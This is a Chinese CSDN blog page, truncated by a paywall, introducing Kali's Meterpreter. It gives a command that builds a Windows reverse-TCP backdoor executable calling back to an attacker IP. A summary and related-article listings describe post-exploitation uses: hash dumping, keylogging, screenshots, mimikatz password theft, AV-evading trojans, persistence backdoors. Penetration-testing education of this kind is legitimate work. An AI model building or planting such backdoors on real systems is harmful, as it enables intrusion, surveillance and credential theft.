kali漏洞利用之Meterpreter介绍

最新推荐文章于 2024-07-15 12:09:10 发布

the__apollo

最新推荐文章于 2024-07-15 12:09:10 发布

阅读量3.8k

点赞数

分类专栏：网络攻防文章标签：漏洞 exe tcp

本文链接：https://blog.csdn.net/The__Apollo/article/details/70476001

版权

本文介绍了如何在Kali Linux中生成和利用Meterpreter后门。通过设置LHOST和LPORT参数，将door.exe植入目标主机，然后在Kali上开启handler等待连接。成功连接后，可以使用Meterpreter的各种命令，如sysinfo、hashdump、screenshot、keyscan_start等进行系统信息查看、哈希抓取、屏幕截图和键盘记录。此外，还提及了扩展工具mimikatz和wdigest，它们能用于抓取明文密码和凭据。

摘要由CSDN通过智能技术生成

这里写图片描述
使用示例：

1.生成Meterpreter后门

命令语句如下，如果其中的IP为kali攻击机的IP地址，后面跟着的是参数。

msfpayload windows/meterpreter/reverse_tcp LHOST=222.28.136.223 LPORT=2333 R|msfencode -t exe -c 5 > /root/door.exe

　这个语句中，如果不知道参数是什么，可以在metasploit中查看，查看方式如下
　

use exploit/mult

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

the__apollo

关注关注

0
点赞
踩
10

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

Kali Linux 漏洞利用工具集 metasploit 教程

Sumarua的博客

07-27

2717

文章目录Kali Linux 漏洞利用工具集 metasploit 教程理解基本概念和术语metasploit 命令用法：核心命令模块命令工作命令资源脚本命令数据库后端命令凭证后端命令Metasploit效果与评价： Kali Linux 漏洞利用工具集 metasploit 教程 Metasploit Pro是一个开发和漏洞验证工具，可帮助您将渗透测试工作流划分为更小，更易管理的任务。借助Metasploit Pro，您可以通过基于Web的用户界面利用Metasploit Framework及其利用数据库

网络安全kali web安全 Kali之msf简单的漏洞利用

xueshenlaila的博客

03-08

1万+

信息收集靶机的IP地址为：192.168.173.136 利用nmap工具扫描其开放端口、系统等整理一下目标系统的相关信息系统版本：Windows server 2003 开放的端口及服务： 21/tcp ftp 135/tcp msrpc 139/tcp netbios-ssn 445/tcp microsoft-ds 777/tcp multiling-http 1025/tcp NFS-or-IIS 1026/tcp LSA-or-nterm 1029/tcp ms

参与评论您还未登录，请先登录后发表或查看评论

[Kali]--Meterpreter深度渗透

wwxxee

11-06

1009

Meterpreter深度渗透通常情况下，meterpreter的权限就是被攻击进程的启动权限或被攻击用户的执行权限。 Meterpreter会话下： upload：从kali主机上传到靶机 upload /usr/share/windows-binarier/nc.exe C:\ getuid：查看meterpreter的系统运行权限 ps：当前正在运行的进程列表 download：从靶机下载文件到本机上 systeminfo： execute -f notepad.exe：执行程序，加-H可

kali linux之Meterpreter

weixin_30950887的博客

03-07

1258

高级，动态，可扩展的payload 基于meterpreter上下文利用更多漏洞发起攻击，后渗透阶段一站式操作界面完全基于内存的dll注入式payload（不写硬盘）注入合法系统进程并建立stager 基于stager上传和预加载dll进行扩展模块的注入（客户端api）基于stager建立的socket连接建立加密的TLS/1.0通信隧道 ...

Kali Linux 网络扫描秘籍（四）

最新发布

龙哥盟

07-15

1074

作者：Justin Hutchens任何时候，当你通过互联网访问公开资源，甚至通过内部网络访问小型社区时，重要的是要考虑拒绝服务（DoS）攻击的风险。DoS 攻击可能令人沮丧，并且可能非常昂贵。最糟糕的是，这些威胁往往是一些最难以缓解的威胁。为了能够正确评估对网络和信息资源的威胁，必须了解现有的 DoS 威胁的类型以及与之相关的趋势。在单独讨论列出的每个秘籍之前，我们应该强调一些基本原则，并了解它们如何与本章中讨论的 DoS 攻击相关。

利用kali Linux使用meterpreter制作免杀木马测试入侵windows电脑

WuHao的博客

10-26

5759

前言：常规使用meterpreter制作木马时会被各大杀毒软件所拦截，固本文介绍一下利用meterpreter下的Venom制作免杀木马。首先安装Venom Venon克隆地址：https://github.com/r00t-3xp10it/venom tar.gz OR zip OR git clone 2.赋予文件可执行权限： cd venom-main sudo chmod -R +x *.sh 3.安装依赖关系包： cd aux sudo ./setup.sh 4.运行 sudo.

Kali Linux渗透测试——MSF实战篇（一）

Captain_RB的博客

01-07

1万+

MSF学习笔记——实战篇(一）MSF学习笔记——实战篇(一)一、信息收集（一）db_nmap（二）Auxiliary模块1.arp扫描2.端口扫描3.空闲扫描4.UDP扫描5.密码嗅探6.SNMP扫描(161端口)6.SMB扫描(445端口)7.SSH扫描(22端口)8.扫描Windows缺少的补丁9.mssql扫描(TCP 1443或者UDP 1434端口)10.ftp扫描(21端口)二、漏洞扫...

Kali系统MSF模块暴力破解MySQL弱口令漏洞

mooyuan的博客

11-24

9162

攻击环境使用KALI系统（使用虚拟机搭建）的Metasploit模块，msfconsole是metasploit中的一个工具，它集成了很多漏洞的利用的脚本，并且使用起来很简单的网络安全工具。这里要特别强调：被攻击的环境必须开启mysql远程登陆服务,通常MySQL开启的端口号是3306，故而一般情况下要求被攻击的服务器开启了3306端口号。

kali Linux系统的漏洞利用

06-19

Meterpreter是Metasploit框架的核心组件之一，它可以作为漏洞利用成功后的一个后门程序，为攻击者提供与受害主机之间的交互式通信渠道。 - **功能介绍**： - 文件系统访问。 - 系统信息收集。 - 网络监听。 - ...

Kali-linux控制Meterpreter

2301_77162959的博客

05-17

1142

Meterpreter是Metasploit框架中的一个杀手锏，通常作为利用漏洞后的攻击载荷所使用，攻击载荷在触发漏洞后能够返回给用户一个控制通道。当使用Armitage、MSFCLI或MSFCONSOLE获取到目标系统上的一个Meterpreter连接时，用户必须使用Meterpreter传递攻击载荷。MSFCONSOLE用于管理用户的会话，而Meterpreter则是攻击载荷和渗透攻击交互。本节将介绍Meterpreter的使用。

Kali--MSF-永恒之蓝详解（复现、演示、远程、后门、加壳、修复）

热门推荐

m0_65712192的博客

11-01

3万+

Kali--MSF-永恒之蓝详解（复现、演示、远程、后门、加壳、修复）

MSF模拟渗透测试攻击linux实例

lza20001103的博客

04-09

9482

MSF模拟渗透测试攻击linux实例

12.3、后渗透测试--持久化后门

无痕的博客

12-13

2407

metasploit后渗透测试--持久化后门

如何创建和删除系统隐藏帐户

Fashion12315的专栏

11-05

1768

　当黑客入侵一台主机后，会想方设法保护自己的“劳动成果”，因此会在肉鸡上留下种种后门来长时间得控制肉鸡,其中使用最多的就是账户隐藏技术。在肉鸡上建立一个隐藏的账户，以备需要的时候使用。账户隐藏技术可谓是最隐蔽的后门，一般用户很难发现系统中隐藏账户的存在，因此危害性很大，本文就对隐藏账户这种黑客常用的技术进行揭密。　　在隐

《Metasploit 魔鬼训练营》05 网络服务渗透攻击

kevinhanser

11-07

4412

本文记录 Kali Linux 2017.1 学习使用 Metasploit 的详细过程 1. 内存攻防技术 2. MS08-067 攻击案例 3. Oricle 数据库 4. KingView 6.53 HistorySrv 渗透攻击 5. Samba 安全漏洞

kali渗透测试与教学笔记8

lm19770429的专栏

04-24

255

第三方网路服务渗透攻击实战：Oracle数据库

kali 2016 Metasploit启动

m0_37552597的博客

05-11

5347

运行 Metasploit Framework 运行 service Metasploit start 无任何反应，提醒报错： Failed to start metasploit.service: Unit metasploit.service failed to load: No such file or directory. 1.在kali中metasploit默认使

Kali--meterpreter找不到shell选项meterpreter > shell [-] Unknown command: shell.

齐泽文的Blog

04-22

1万+

今天在使用kali进行学习是，发现在进入meterpreter控制台后只有core命令，刚开始以为是虚拟机坏掉了，后来发现，是因为没有连接成功，1.问题重现：root@qzwhost:~# msfconsole _ ...

kali meterpreter

03-25

是什么？ A：Kali Meterpreter是一个基于Metasploit框架的后渗透工具，用于远程控制和管理受攻击主机。它可以利用漏洞获得对被攻击系统的控制权，并提供了一系列命令和功能，包括文件操作、网络监视、截屏、键盘记录等，可用于渗透测试、网络安全评估等领域。